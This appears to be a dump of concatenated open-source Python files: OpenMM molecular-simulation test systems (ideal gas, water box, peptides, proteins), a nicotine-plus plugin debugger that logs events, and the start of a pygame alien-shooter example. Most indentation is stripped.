# Add long-range correction.
if switch:
# TODO
pass
else:
volume = x*y*z
density = natoms / volume
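            # Standard Lennard-Jones tail correction: integrating
            # 4*epsilon*((sigma/r)^12 - (sigma/r)^6) against 2*pi*density*r^2 dr
            # from the cutoff to infinity yields the attractive -(8/3) and
            # repulsive +(8/9) terms below.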
per_particle_dispersion_energy = -(8./3.)*math.pi*epsilon*(sigma**6)/(cutoff**3)*density # attraction
per_particle_dispersion_energy += (8./9.)*math.pi*epsilon*(sigma**12)/(cutoff**9)*density # repulsion
energy_expression = "%f" % (per_particle_dispersion_energy / units.kilojoules_per_mole)
force = mm.CustomExternalForce(energy_expression)
for i in range(natoms):
force.addParticle(i, [])
system.addForce(force)
self.system, self.positions = system, positions
#=============================================================================================
# Ideal gas
#=============================================================================================
class IdealGas(TestSystem):
"""Create an 'ideal gas' of noninteracting particles in a periodic box.
Parameters
----------
nparticles : int, optional, default=216
number of particles
    mass : simtk.unit.Quantity, optional, default=39.9 * units.amu
    temperature : simtk.unit.Quantity, optional, default=298.0 * units.kelvin
    pressure : simtk.unit.Quantity, optional, default=1.0 * units.atmosphere
    volume : simtk.unit.Quantity, optional, default=None
        if None, defaults to (nparticles * temperature * units.BOLTZMANN_CONSTANT_kB / pressure).in_units_of(units.nanometers**3)
Examples
--------
Create an ideal gas system.
>>> gas = IdealGas()
>>> system, positions = gas.system, gas.positions
Create a smaller ideal gas system containing 64 particles.
>>> gas = IdealGas(nparticles=64)
>>> system, positions = gas.system, gas.positions
"""
def __init__(self, nparticles=216, mass=39.9 * units.amu, temperature=298.0 * units.kelvin, pressure=1.0 * units.atmosphere, volume=None):
if volume is None:
volume = (nparticles * temperature * units.BOLTZMANN_CONSTANT_kB / pressure).in_units_of(units.nanometers**3)
charge = 0.0 * units.elementary_charge
sigma = 3.350 * units.angstrom # argon LJ
epsilon = 0.0 * units.kilojoule_per_mole # zero interaction
# Create an empty system object.
system = mm.System()
# Compute box size.
length = volume**(1.0/3.0)
a = units.Quantity((length, 0*units.nanometer, 0*units.nanometer))
b = units.Quantity((0*units.nanometer, length, 0*units.nanometer))
c = units.Quantity((0*units.nanometer, 0*units.nanometer, length))
system.setDefaultPeriodicBoxVectors(a, b, c)
# Add particles.
for index in range(nparticles):
system.addParticle(mass)
# Place particles at random positions within the box.
# TODO: Use reproducible seed.
# NOTE: This may not be thread-safe.
state = np.random.get_state()
np.random.seed(0)
positions = units.Quantity((length/units.nanometer) * np.random.rand(nparticles,3), units.nanometer)
np.random.set_state(state)
self.system, self.positions = system, positions
self.ndof = 3 * nparticles
def get_potential_expectation(self, state):
"""Return the expectation of the potential energy, computed analytically or numerically.
Arguments
---------
state : ThermodynamicState with temperature defined
The thermodynamic state at which the property is to be computed.
Returns
-------
potential_mean : simtk.unit.Quantity compatible with simtk.unit.kilojoules_per_mole
The expectation of the potential energy.
"""
return 0.0 * units.kilojoules_per_mole
def get_potential_standard_deviation(self, state):
"""Return the standard deviation of the potential energy, computed analytically or numerically.
Arguments
---------
state : ThermodynamicState with temperature defined
The thermodynamic state at which the property is to be computed.
Returns
-------
potential_stddev : simtk.unit.Quantity compatible with simtk.unit.kilojoules_per_mole
potential energy standard deviation if implemented, or else None
"""
return 0.0 * units.kilojoules_per_mole
def get_kinetic_expectation(self, state):
"""Return the expectation of the kinetic energy, computed analytically or numerically.
Arguments
---------
state : ThermodynamicState with temperature defined
The thermodynamic state at which the property is to be computed.
Returns
-------
        kinetic_mean : simtk.unit.Quantity compatible with simtk.unit.kilojoules_per_mole
            The expectation of the kinetic energy.
"""
return (3./2.) * kB * state.temperature
def get_kinetic_standard_deviation(self, state):
"""Return the standard deviation of the kinetic energy, computed analytically or numerically.
Arguments
---------
state : ThermodynamicState with temperature defined
The thermodynamic state at which the property is to be computed.
Returns
-------
        kinetic_stddev : simtk.unit.Quantity compatible with simtk.unit.kilojoules_per_mole
            kinetic energy standard deviation if implemented, or else None
"""
return (3./2.) * kB * state.temperature
def get_volume_expectation(self, state):
"""Return the expectation of the volume, computed analytically.
Arguments
---------
state : ThermodynamicState with temperature and pressure defined
The thermodynamic state at which the property is to be computed.
Returns
-------
volume_mean : simtk.unit.Quantity compatible with simtk.unit.nanometers**3
The expectation of the volume at equilibrium.
Notes
-----
The true mean volume is used, rather than the large-N limit.
"""
if not state.pressure:
box_vectors = self.system.getDefaultPeriodicBoxVectors()
volume = box_vectors[0][0] * box_vectors[1][1] * box_vectors[2][2]
return volume
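# For an ideal gas in the isothermal-isobaric (NPT) ensemble, the partition
# function gives the exact result <V> = (N+1) kB T / P, rather than the
# large-N limit N kB T / P.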
N = self.system.getNumParticles()
return ((N+1) * units.BOLTZMANN_CONSTANT_kB * state.temperature / state.pressure).in_units_of(units.nanometers**3)
def get_volume_standard_deviation(self, state):
"""Return the standard deviation of the volume, computed analytically.
Arguments
---------
state : ThermodynamicState with temperature and pressure defined
The thermodynamic state at which the property is to be computed.
Returns
-------
volume_stddev : simtk.unit.Quantity compatible with simtk.unit.nanometers**3
The standard deviation of the volume at equilibrium.
Notes
-----
The true mean volume is used, rather than the large-N limit.
"""
if not state.pressure:
return 0.0 * units.nanometers**3
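# Exact NPT ideal-gas result: Var(V) = (N+1) (kB T / P)^2, hence
# stddev(V) = sqrt(N+1) kB T / P.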
N = self.system.getNumParticles()
return (np.sqrt(N+1) * units.BOLTZMANN_CONSTANT_kB * state.temperature / state.pressure).in_units_of(units.nanometers**3)
#=============================================================================================
# Water box
#=============================================================================================
class WaterBox(TestSystem):
"""Create a test system containing a periodic box of TIP3P water.
Flexible bond and angle terms are added when flexible=True, and constraints are optional (both on by default).
Adding flexible bond and angle terms doesn't affect constrained dynamics, but allows minimization to work properly.
Parameters
----------
constrain : bool, optional, default=True
if True, will also constrain OH and HH bonds in water (default: True)
flexible : bool, optional, default=True,
if True, will add harmonic OH bond and HOH angle terms
cutoff : Quantity, optional, default=None,
If None, defaults to box_size / 2.0 * 0.999
nonbonded_method : OpenMM NonbondedForce method, optional, default=None
If None, NonbondedForce.CutoffPeriodic is used.
filename : str, optional, default="watbox216.pdb"
name of file containing water positions
charges : bool, optional, default=True
if False, all partial atomic charges are set to zero
Examples
--------
Create a 216-water system.
>>> water_box = WaterBox()
>>> (system, positions) = water_box.system, water_box.positions
TODO
----
* Allow size of box (either dimensions or number of waters) to be specified, replicating equilibrated waterbox to fill these dimensions.
"""
def __init__(self, constrain=True, flexible=True, cutoff=None, nonbonded_method=None, filename=None, charges=True):
# Construct filename
if filename is None:
filename = os.path.join(os.path.dirname(__file__), 'data', 'waterbox', 'watbox216.pdb')
# Atomic masses for water
massO = 16.0 * units.amu
massH = 1.0 * units.amu
# Partial atomic charges for TIP3P water
if charges:
qO = -0.8340 * units.elementary_charge
qH = 0.4170 * units.elementary_charge
else:
qO = 0.0 * units.elementary_charge
qH = 0.0 * units.elementary_charge
# Lennard-Jones parameters for oxygen-oxygen interactions
sigma = 3.15061 * units.angstrom
epsilon = 0.6364 * units.kilojoule_per_mole
# Water bond and angle values
rOH = 0.9572 * units.angstrom
aHOH = 104.52 * units.degree
# Water bond and angle spring constants.
kOH = 553.0 * units.kilocalories_per_mole / units.angstrom**2 # from AMBER parm96
kHOH = 100.0 * units.kilocalories_per_mole / units.radian**2 # from AMBER parm96
# Distance between the two H atoms in water
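# Two O-H bonds of length rOH opening at angle aHOH form an isosceles triangle,
# so the H-H distance is rHH = 2 rOH sin(aHOH/2).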
rHH = 2*rOH*units.sin(aHOH/2.0)
def loadCoordsHOH(infile):
"""
Load water positions from a PDB file.
"""
pdbData = []
atomNum = 0
resNum = 0
for line in infile:
if line.find('HETATM')==0 or line.find('ATOM ')==0:
resName=line[17:20]
if resName in ['HOH', 'WAT', 'SOL']:
atomNum+=1
atomName=line[12:16].strip()
if atomName in ['O', 'OW']:
resNum+=1
try:
if atomName==pdbData[-1][1] or atomName==pdbData[-2][1]:
raise Exception("bad water molecule near %s..." % line[:27])
except IndexError:
pass
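# PDB fixed-column format: x, y, z occupy character columns 31-38, 39-46 and
# 47-54 respectively, in Angstroms.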
x = float(line[30:38])
y = float(line[38:46])
z = float(line[46:54])
pdbData.append( (atomNum, atomName, resName, resNum, ((x, y, z) * units.angstrom) ) )
return pdbData
# Load waters from input pdb file
infile = open(filename, 'r')
pdbData = loadCoordsHOH(infile)
infile.close()
# Determine number of atoms.
natoms = len(pdbData)
# Create water system, which will include force field
# and general system parameters
system = mm.System()
# Create nonbonded, harmonic bond, and harmonic angle forces.
nb = mm.NonbondedForce()
bond = mm.HarmonicBondForce()
angle = mm.HarmonicAngleForce()
# Add water molecules to system
# Bond lengths are rigid (constrained) when constrain=True; harmonic bond and angle forces are added when flexible=True
count = 0
positions = units.Quantity(np.zeros([natoms,3], np.float32), units.nanometer)
for atomNum, atomName, resName, resNum, xyz in pdbData:
if atomName in ['O', 'OW']:
# Add an oxygen atom
system.addParticle(massO)
nb.addParticle(qO, sigma, epsilon)
lastOxygen = count
elif atomName in ['H1', 'H2', 'HW1', 'HW2']:
# Add a hydrogen atom
system.addParticle(massH)
zero_chargeprod = 0.0 * units.elementary_charge**2
unit_sigma = 1.0 * units.angstroms
zero_epsilon = 0.0 * units.kilocalories_per_mole
nb.addParticle(qH, unit_sigma, zero_epsilon)
if (count == lastOxygen+1):
# For the last oxygen and hydrogen number 1:
if constrain: system.addConstraint(lastOxygen, count, rOH) #O-H1
# Add harmonic bond force for this bond.
bond.addBond(lastOxygen, count, rOH, kOH)
# Exception: chargeProd=0.0, sigma=1.0, epsilon=0.0
nb.addException(lastOxygen, count, zero_chargeprod, unit_sigma, zero_epsilon) #O-H1
elif (count == lastOxygen+2):
# For the last oxygen and hydrogen number 2:
if constrain: system.addConstraint(lastOxygen, count, rOH) #O-H2
# Add harmonic bond force for this bond.
bond.addBond(lastOxygen, count, rOH, kOH)
# Exception: chargeProd=0.0, sigma=1.0, epsilon=0.0
nb.addException(lastOxygen, count, zero_chargeprod, unit_sigma, zero_epsilon) #O-H2
# For hydrogen number 1 and hydrogen number 2
if constrain: system.addConstraint(count-1, count, rHH) #H1-H2
# Add harmonic angle bend.
angle.addAngle(count-1, lastOxygen, count, aHOH, kHOH)
# Exception: chargeProd=0.0, sigma=1.0, epsilon=0.0
nb.addException(count-1, count, zero_chargeprod, unit_sigma, zero_epsilon) #H1-H2
else:
s = "too many hydrogens:"
s += " atomNum=%d, resNum=%d, resName=%s, atomName=%s" % (atomNum, resNum, resName, atomName)
raise Exception(s)
else:
raise Exception("bad atom : %s" % atomName)
for k in range(3):
positions[count,k] = xyz[k]
count += 1
# Determine box size from maximum extent.
box_extents = units.Quantity(np.zeros([3]), units.nanometers)
for k in range(3):
box_extents[k] = (positions[:,k] / units.nanometers).max() * units.nanometers - (positions[:,k] / units.nanometers).min() * units.nanometers
box_size = (box_extents / units.nanometers).max() * units.nanometers
# Set box vectors.
a = units.Quantity(np.zeros([3]), units.nanometers); a[0] = box_size
b = units.Quantity(np.zeros([3]), units.nanometers); b[1] = box_size
c = units.Quantity(np.zeros([3]), units.nanometers); c[2] = box_size
system.setDefaultPeriodicBoxVectors(a, b, c)
# Set nonbonded cutoff.
nb.setNonbondedMethod(mm.NonbondedForce.CutoffPeriodic)
if (nonbonded_method is not None):
nb.setNonbondedMethod(nonbonded_method)
if (cutoff is None) or (cutoff >= box_size / 2.0):
cutoff = box_size / 2.0 * 0.999 # cutoff should be smaller than half the box length
nb.setCutoffDistance(cutoff)
# Add force terms to system.
system.addForce(nb)
if flexible:
system.addForce(bond)
system.addForce(angle)
self.system, self.positions = system, positions
#=============================================================================================
# Alanine dipeptide in implicit solvent.
#=============================================================================================
class AlanineDipeptideImplicit(TestSystem):
"""Alanine dipeptide ff96 in OBC GBSA implicit solvent.
Parameters
----------
flexibleConstraints : bool, optional, default=True
shake : string, optional, default="h-bonds"
Examples
--------
>>> alanine = AlanineDipeptideImplicit()
>>> (system, positions) = alanine.system, alanine.positions
"""
def __init__(self, flexibleConstraints=True, shake='h-bonds'):
# Determine prmtop and crd filenames in test directory.
# TODO: This will need to be revised in order to be able to find the test systems.
prmtop_filename = os.path.join(os.path.dirname(__file__), 'data', 'alanine-dipeptide-gbsa', 'alanine-dipeptide.prmtop')
crd_filename = os.path.join(os.path.dirname(__file__), 'data', 'alanine-dipeptide-gbsa', 'alanine-dipeptide.crd')
# Initialize system.
prmtop = app.AmberPrmtopFile(prmtop_filename)
system = prmtop.createSystem(implicitSolvent=app.OBC1, constraints=app.HBonds, nonbondedCutoff=None)
# Read positions.
inpcrd = app.AmberInpcrdFile(crd_filename)
positions = inpcrd.getPositions(asNumpy=True)
self.system, self.positions = system, positions
#=============================================================================================
# Alanine dipeptide in explicit solvent
#=============================================================================================
class AlanineDipeptideExplicit(TestSystem):
"""Alanine dipeptide ff96 in TIP3P explicit solvent with PME electrostatics.
Parameters
----------
flexibleConstraints : bool, optional, default=True
shake : string, optional, default="h-bonds"
nonbondedCutoff : Quantity, optional, default=9.0 * units.angstroms
use_dispersion_correction : bool, optional, default=True
If True, the long-range dispersion correction will be used.
Examples
--------
>>> alanine = AlanineDipeptideExplicit()
>>> (system, positions) = alanine.system, alanine.positions
"""
def __init__(self, flexibleConstraints=True, shake='h-bonds', nonbondedCutoff=9.0 * units.angstroms, use_dispersion_correction=True):
# Determine prmtop and crd filenames in test directory.
# TODO: This will need to be revised in order to be able to find the test systems.
prmtop_filename = os.path.join(os.path.dirname(__file__), 'data', 'alanine-dipeptide-explicit', 'alanine-dipeptide.prmtop')
crd_filename = os.path.join(os.path.dirname(__file__), 'data', 'alanine-dipeptide-explicit', 'alanine-dipeptide.crd')
# Initialize system.
prmtop = app.AmberPrmtopFile(prmtop_filename)
system = prmtop.createSystem(constraints=app.HBonds, nonbondedMethod=app.PME, rigidWater=True, nonbondedCutoff=0.9*units.nanometer)
# Set dispersion correction use.
forces = { system.getForce(index).__class__.__name__ : system.getForce(index) for index in range(system.getNumForces()) }
forces['NonbondedForce'].setUseDispersionCorrection(use_dispersion_correction)
# Read positions.
inpcrd = app.AmberInpcrdFile(crd_filename, loadBoxVectors=True)
positions = inpcrd.getPositions(asNumpy=True)
# Set box vectors.
box_vectors = inpcrd.getBoxVectors(asNumpy=True)
system.setDefaultPeriodicBoxVectors(box_vectors[0], box_vectors[1], box_vectors[2])
self.system, self.positions = system, positions
#=============================================================================================
# T4 lysozyme L99A mutant with p-xylene ligand.
#=============================================================================================
class LysozymeImplicit(TestSystem):
"""T4 lysozyme L99A (AMBER ff96) with p-xylene ligand (GAFF + AM1-BCC) in implicit OBC GBSA solvent.
Parameters
----------
flexibleConstraints : bool, optional, default=True
shake : string, optional, default="h-bonds"
Examples
--------
>>> lysozyme = LysozymeImplicit()
>>> (system, positions) = lysozyme.system, lysozyme.positions
"""
def __init__(self, flexibleConstraints=True, shake='h-bonds'):
# Determine prmtop and crd filenames in test directory.
# TODO: This will need to be revised in order to be able to find the test systems.
prmtop_filename = os.path.join(os.path.dirname(__file__), 'data', 'T4-lysozyme-L99A-implicit', 'complex.prmtop')
crd_filename = os.path.join(os.path.dirname(__file__), 'data', 'T4-lysozyme-L99A-implicit', 'complex.crd')
# Initialize system.
prmtop = app.AmberPrmtopFile(prmtop_filename)
system = prmtop.createSystem(implicitSolvent=app.OBC1, constraints=app.HBonds, nonbondedCutoff=None)
# Read positions.
inpcrd = app.AmberInpcrdFile(crd_filename)
positions = inpcrd.getPositions(asNumpy=True)
self.system, self.positions = system, positions
class SrcImplicit(TestSystem):
"""Src kinase in implicit AMBER 99sb-ildn with OBC GBSA solvent.
Examples
--------
>>> src = SrcImplicit()
>>> system, positions = src.system, src.positions
"""
def __init__(self):
# Determine prmtop and crd filenames in test directory.
# TODO: This will need to be revised in order to be able to find the test systems.
pdb_filename = os.path.join(os.path.dirname(__file__), 'data', 'src-implicit', 'implicit-refined.pdb')
# Read PDB.
pdbfile = app.PDBFile(pdb_filename)
# Construct system.
forcefields_to_use = ['amber99sbildn.xml', 'amber99_obc.xml'] # list of forcefields to use in parameterization
forcefield = app.ForceField(*forcefields_to_use)
system = forcefield.createSystem(pdbfile.topology, nonbondedMethod=app.NoCutoff, constraints=app.HBonds)
# Get positions.
positions = pdbfile.getPositions()
self.system, self.positions = system, positions
#=============================================================================================
# Src kinase in explicit solvent.
#=============================================================================================
class SrcExplicit(TestSystem):
"""Src kinase (AMBER 99sb-ildn) in explicit TIP3P solvent.
Examples
--------
>>> src = SrcExplicit()
>>> system, positions = src.system, src.positions
"""
def __init__(self):
# Determine prmtop and crd filenames in test directory.
# TODO: This will need to be revised in order to be able to find the test systems.
system_xml_filename = os.path.join(os.path.dirname(__file__), 'data', 'src-explicit', 'system.xml')
state_xml_filename = os.path.join(os.path.dirname(__file__), 'data', 'src-explicit', 'state.xml')
# Read system.
infile = open(system_xml_filename, 'r')
system = mm.XmlSerializer.deserialize(infile.read())
infile.close()
# Read state.
infile = open(state_xml_filename, 'r')
serialized_state = mm.XmlSerializer.deserialize(infile.read())
infile.close()
positions = serialized_state.getPositions()
box_vectors = serialized_state.getPeriodicBoxVectors()
system.setDefaultPeriodicBoxVectors(*box_vectors)
self.system, self.positions = system, positions
#=============================================================================================
# Methanol box.
#=============================================================================================
class MethanolBox(TestSystem):
"""Methanol box.
Parameters
----------
flexibleConstraints : bool, optional, default=True
shake : string, optional, default="h-bonds"
nonbondedCutoff : Quantity, optional, default=7.0 * units.angstroms
nonbondedMethod : str, optional, default="CutoffPeriodic"
Examples
--------
>>> methanol_box = MethanolBox()
>>> system, positions = methanol_box.system, methanol_box.positions
"""
def __init__(self, flexibleConstraints=True, shake='h-bonds', nonbondedCutoff=7.0 * units.angstroms, nonbondedMethod='CutoffPeriodic'):
# Determine prmtop and crd filenames in test directory.
# TODO: This will need to be revised in order to be able to find the test systems.
system_name = 'methanol-box'
prmtop_filename = os.path.join(os.path.dirname(__file__), 'data', system_name, system_name + '.prmtop')
crd_filename = os.path.join(os.path.dirname(__file__), 'data', system_name, system_name + '.crd')
# Initialize system.
prmtop = app.AmberPrmtopFile(prmtop_filename)
system = prmtop.createSystem(constraints=app.HBonds, nonbondedMethod=app.PME, rigidWater=True, nonbondedCutoff=0.9*units.nanometer)
# Read positions.
inpcrd = app.AmberInpcrdFile(crd_filename, loadBoxVectors=True)
positions = inpcrd.getPositions(asNumpy=True)
# Set box vectors.
box_vectors = inpcrd.getBoxVectors(asNumpy=True)
system.setDefaultPeriodicBoxVectors(box_vectors[0], box_vectors[1], box_vectors[2])
self.system, self.positions = system, positions
#=============================================================================================
# Molecular ideal gas (methanol box).
#=============================================================================================
class MolecularIdealGas(TestSystem):
"""Molecular ideal gas (methanol box).
Parameters
----------
flexibleConstraints : bool, optional, default=True
shake : string, optional, default=None
nonbondedCutoff : Quantity, optional, default=7.0 * units.angstroms
nonbondedMethod : str, optional, default="CutoffPeriodic"
Examples
--------
>>> methanol_box = MolecularIdealGas()
>>> system, positions = methanol_box.system, methanol_box.positions
"""
def __init__(self, flexibleConstraints=True, shake=None, nonbondedCutoff=7.0 * units.angstroms, nonbondedMethod='CutoffPeriodic'):
# Determine prmtop and crd filenames in test directory.
# TODO: This will need to be revised in order to be able to find the test systems.
system_name = 'methanol-box'
prmtop_filename = os.path.join(os.path.dirname(__file__), 'data', system_name, system_name + '.prmtop')
crd_filename = os.path.join(os.path.dirname(__file__), 'data', system_name, system_name + '.crd')
# Initialize system.
prmtop = app.AmberPrmtopFile(prmtop_filename)
reference_system = prmtop.createSystem(constraints=app.HBonds, nonbondedMethod=app.PME, rigidWater=True, nonbondedCutoff=0.9*units.nanometer)
# Make a new system that contains no intermolecular interactions.
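# Approach: copy masses, constraints, and bonded (intramolecular) forces from
# the reference system, but omit the NonbondedForce so that molecules do not
# interact with one another -- a "molecular ideal gas".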
system = mm.System()
# Add atoms.
for atom_index in range(reference_system.getNumParticles()):
mass = reference_system.getParticleMass(atom_index)
system.addParticle(mass)
# Add constraints
for constraint_index in range(reference_system.getNumConstraints()):
[iatom, jatom, r0] = reference_system.getConstraintParameters(constraint_index)
system.addConstraint(iatom, jatom, r0)
# Copy only intramolecular forces.
nforces = reference_system.getNumForces()
for force_index in range(nforces):
reference_force = reference_system.getForce(force_index)
if isinstance(reference_force, mm.HarmonicBondForce):
# HarmonicBondForce
force = mm.HarmonicBondForce()
for bond_index in range(reference_force.getNumBonds()):
[iatom, jatom, r0, K] = reference_force.getBondParameters(bond_index)
force.addBond(iatom, jatom, r0, K)
system.addForce(force)
elif isinstance(reference_force, mm.HarmonicAngleForce):
# HarmonicAngleForce
force = mm.HarmonicAngleForce()
for angle_index in range(reference_force.getNumAngles()):
[iatom, jatom, katom, theta0, Ktheta] = reference_force.getAngleParameters(angle_index)
force.addAngle(iatom, jatom, katom, theta0, Ktheta)
system.addForce(force)
elif isinstance(reference_force, mm.PeriodicTorsionForce):
# PeriodicTorsionForce
force = mm.PeriodicTorsionForce()
for torsion_index in range(reference_force.getNumTorsions()):
[particle1, particle2, particle3, particle4, periodicity, phase, k] = reference_force.getTorsionParameters(torsion_index)
force.addTorsion(particle1, particle2, particle3, particle4, periodicity, phase, k)
system.addForce(force)
else:
# Don't add any other forces.
pass
# Read positions.
inpcrd = app.AmberInpcrdFile(crd_filename, loadBoxVectors=True)
positions = inpcrd.getPositions(asNumpy=True)
# Set box vectors.
box_vectors = inpcrd.getBoxVectors(asNumpy=True)
system.setDefaultPeriodicBoxVectors(box_vectors[0], box_vectors[1], box_vectors[2])
self.system, self.positions = system, positions
#=============================================================================================
# System of particles with CustomGBForce
#=============================================================================================
class CustomGBForceSystem(TestSystem):
"""A system of particles with a CustomGBForce.
Notes
-----
This example comes from TestReferenceCustomGBForce.cpp from the OpenMM distribution.
Examples
--------
>>> gb_system = CustomGBForceSystem()
>>> system, positions = gb_system.system, gb_system.positions
"""
def __init__(self):
numMolecules = 70
numParticles = numMolecules*2
boxSize = 10.0 * units.nanometers
# Default parameters
mass = 39.9 * units.amu
sigma = 3.350 * units.angstrom
epsilon = 0.001603 * units.kilojoule_per_mole
cutoff = 2.0 * units.nanometers
system = mm.System()
for i in range(numParticles):
system.addParticle(mass)
system.setDefaultPeriodicBoxVectors(mm.Vec3(boxSize, 0.0, 0.0), mm.Vec3(0.0, boxSize, 0.0), mm.Vec3(0.0, 0.0, boxSize))
# Create NonbondedForce.
nonbonded = mm.NonbondedForce()
nonbonded.setNonbondedMethod(mm.NonbondedForce.CutoffPeriodic)
nonbonded.setCutoffDistance(cutoff)
# Create CustomGBForce.
custom = mm.CustomGBForce()
custom.setNonbondedMethod(mm.CustomGBForce.CutoffPeriodic)
custom.setCutoffDistance(cutoff)
custom.addPerParticleParameter("q")
custom.addPerParticleParameter("radius")
custom.addPerParticleParameter("scale")
custom.addGlobalParameter("solventDielectric", 80.0)
custom.addGlobalParameter("soluteDielectric", 1.0)
custom.addComputedValue("I", "step(r+sr2-or1)*0.5*(1/L-1/U+0.25*(1/U^2-1/L^2)*(r-sr2*sr2/r)+0.5*log(L/U)/r+C);"
"U=r+sr2;"
"C=2*(1/or1-1/L)*step(sr2-r-or1);"
"L=max(or1, D);"
"D=abs(r-sr2);"
"sr2 = scale2*or2;"
"or1 = radius1-0.009; or2 = radius2-0.009", mm.CustomGBForce.ParticlePairNoExclusions);
custom.addComputedValue("B", "1/(1/or-tanh(1*psi-0.8*psi^2+4.85*psi^3)/radius);"
"psi=I*or; or=radius-0.009", mm.CustomGBForce.SingleParticle);
custom.addEnergyTerm("28.3919551*(radius+0.14)^2*(radius/B)^6-0.5*138.935485*(1/soluteDielectric-1/solventDielectric)*q^2/B", mm.CustomGBForce.SingleParticle);
custom.addEnergyTerm("-138.935485*(1/soluteDielectric-1/solventDielectric)*q1*q2/f;"
"f=sqrt(r^2+B1*B2*exp(-r^2/(4*B1*B2)))", mm.CustomGBForce.ParticlePairNoExclusions);
# Add particles.
for i in range(numMolecules):
if (i < numMolecules/2):
charge = 1.0 * units.elementary_charge
radius = 0.2 * units.nanometers
scale = 0.5
nonbonded.addParticle(charge, sigma, epsilon)
custom.addParticle([charge, radius, scale])
charge = -1.0 * units.elementary_charge
radius = 0.1 * units.nanometers
scale = 0.5
nonbonded.addParticle(charge, sigma, epsilon)
custom.addParticle([charge, radius, scale])
else:
charge = 1.0 * units.elementary_charge
radius = 0.2 * units.nanometers
scale = 0.8
nonbonded.addParticle(charge, sigma, epsilon)
custom.addParticle([charge, radius, scale])
charge = -1.0 * units.elementary_charge
radius = 0.1 * units.nanometers
scale = 0.8
nonbonded.addParticle(charge, sigma, epsilon)
custom.addParticle([charge, radius, scale])
system.addForce(nonbonded)
system.addForce(custom)
# Place particles at random positions within the box.
# TODO: Use reproducible random number seed.
# NOTE: This may not be thread-safe.
state = np.random.get_state()
np.random.seed(0)
positions = units.Quantity((boxSize/units.nanometer) * np.random.rand(numParticles,3), units.nanometer)
np.random.set_state(state)
self.system, self.positions = system, positions
#=============================================================================================
# Define test system names
#=============================================================================================
testsystem_classes = TestSystem.__subclasses__()
#=============================================================================================
# MAIN AND TESTS
#=============================================================================================
if __name__ == "__main__":
# Run doctests.
import doctest
doctest.testmod()
# Make sure all advertised analytical properties can be computed.
import simtk.unit as u
state = ThermodynamicState(temperature=300.0*u.kelvin, pressure=1.0*u.atmosphere)
testsystem_classes = TestSystem.__subclasses__()
print "Testing analytical property computation:"
for testsystem_class in testsystem_classes:
class_name = testsystem_class.__name__
testsystem = testsystem_class()
property_list = testsystem.analytical_properties
if len(property_list) > 0:
for property_name in property_list:
method = getattr(testsystem, 'get_' + property_name)
print "%32s . %32s : %32s" % (class_name, property_name, str(method(state)))
|
gpl-2.0
|
eLvErDe/nicotine-plus
|
plugins/plugindebugger/__init__.py
|
1
|
3009
|
from pynicotine.pluginsystem import BasePlugin
def enable(plugins):
global PLUGIN
PLUGIN = Plugin(plugins)
def disable(plugins):
global PLUGIN
PLUGIN = None
class Plugin(BasePlugin):
__name__ = "Plugin Debugger"
__version__ = "2009-05-27r00"
__author__ = "quinox"
__desc__ = """Plugin to examine the flow of events of the plugin system. Not useful if you're not a programmer."""
def init(self):
self.log('init')
def LoadNotification(self):
self.log('LoadNotification')
pass
def IncomingPrivateChatEvent(self, user, line):
self.log('IncomingPrivateChatEvent user=%s, line=%s' % (user, line))
pass
def IncomingPrivateChatNotification(self, user, line):
self.log('IncomingPrivateChatNotification, user=%s, line=%s' % (user, line))
pass
def IncomingPublicChatEvent(self, room, user, line):
self.log('IncomingPublicChatEvent, room=%s, user=%s, line=%s' % (room, user, line))
pass
def IncomingPublicChatNotification(self, room, user, line):
self.log('IncomingPublicChatNotification, room=%s, user=%s, line=%s' % (room, user, line))
pass
def OutgoingPrivateChatEvent(self, user, line):
self.log('OutgoingPrivateChatEvent, user=%s, line=%s' % (user, line))
pass
def OutgoingPrivateChatNotification(self, user, line):
self.log('OutgoingPrivateChatNotification, user=%s, line=%s' % (user, line))
pass
def OutgoingPublicChatEvent(self, room, line):
self.log('OutgoingPublicChatEvent, room=%s, line=%s' % (room, line))
pass
def OutgoingPublicChatNotification(self, room, line):
self.log('OutgoingPublicChatNotification, room=%s, line=%s' % (room, line))
pass
def OutgoingGlobalSearchEvent(self, text):
self.log('OutgoingGlobalSearchEvent, text=%s' % (text,))
pass
def OutgoingRoomSearchEvent(self, rooms, text):
self.log('OutgoingRoomSearchEvent, rooms=%s, text=%s' % (rooms, text))
pass
def OutgoingBuddySearchEvent(self, text):
self.log('OutgoingBuddySearchEvent, text=%s' % (text,))
pass
def OutgoingUserSearchEvent(self, users):
self.log('OutgoingUserSearchEvent, users=%s' % (users,))
pass
def UserResolveNotification(self, user, ip, port, country):
self.log('UserResolveNotification, user=%s, ip=%s, port=%s, country=%s' % (user, ip, port, country))
pass
def ServerConnectNotification(self):
self.log('ServerConnectNotification')
pass
def ServerDisconnectNotification(self, userchoice):
self.log('ServerDisconnectNotification, userchoice=%s' % (userchoice,))
pass
def JoinChatroomNotification(self, room):
self.log('JoinChatroomNotification, room=%s' % (room,))
pass
def LeaveChatroomNotification(self, room):
self.log('LeaveChatroomNotification, room=%s' % (room,))
pass
|
gpl-3.0
|
kenshay/ImageScripter
|
ProgramData/SystemFiles/Python/Lib/site-packages/pygame/examples/macosx/aliens_app_example/aliens.py
|
17
|
9634
|
#! /usr/bin/env python
import random, os.path
#import basic pygame modules
import pygame
from pygame.locals import *
#see if we can load more than standard BMP
if not pygame.image.get_extended():
raise SystemExit("Sorry, extended image module required")
#game constants
MAX_SHOTS = 2 #most player bullets onscreen
ALIEN_ODDS = 22 #chances a new alien appears
BOMB_ODDS = 60 #chances a new bomb will drop
ALIEN_RELOAD = 12 #frames between new aliens
SCREENRECT = Rect(0, 0, 640, 480)
SCORE = 0
def load_image(file):
"loads an image, prepares it for play"
file = os.path.join('data', file)
try:
surface = pygame.image.load(file)
except pygame.error:
raise SystemExit('Could not load image "%s" %s'%(file, pygame.get_error()))
return surface.convert()
def load_images(*files):
imgs = []
for file in files:
imgs.append(load_image(file))
return imgs
class dummysound:
def play(self): pass
def load_sound(file):
if not pygame.mixer: return dummysound()
file = os.path.join('data', file)
try:
sound = pygame.mixer.Sound(file)
return sound
except pygame.error:
print ('Warning, unable to load,', file)
return dummysound()
# each type of game object gets an init and an
# update function. the update function is called
# once per frame, and it is when each object should
# change its current position and state. the Player
# object actually gets a "move" function instead of
# update, since it is passed extra information about
# the keyboard
class Player(pygame.sprite.Sprite):
speed = 10
bounce = 24
gun_offset = -11
images = []
def __init__(self):
pygame.sprite.Sprite.__init__(self, self.containers)
self.image = self.images[0]
self.rect = self.image.get_rect()
self.reloading = 0
self.rect.centerx = SCREENRECT.centerx
self.rect.bottom = SCREENRECT.bottom - 1
self.origtop = self.rect.top
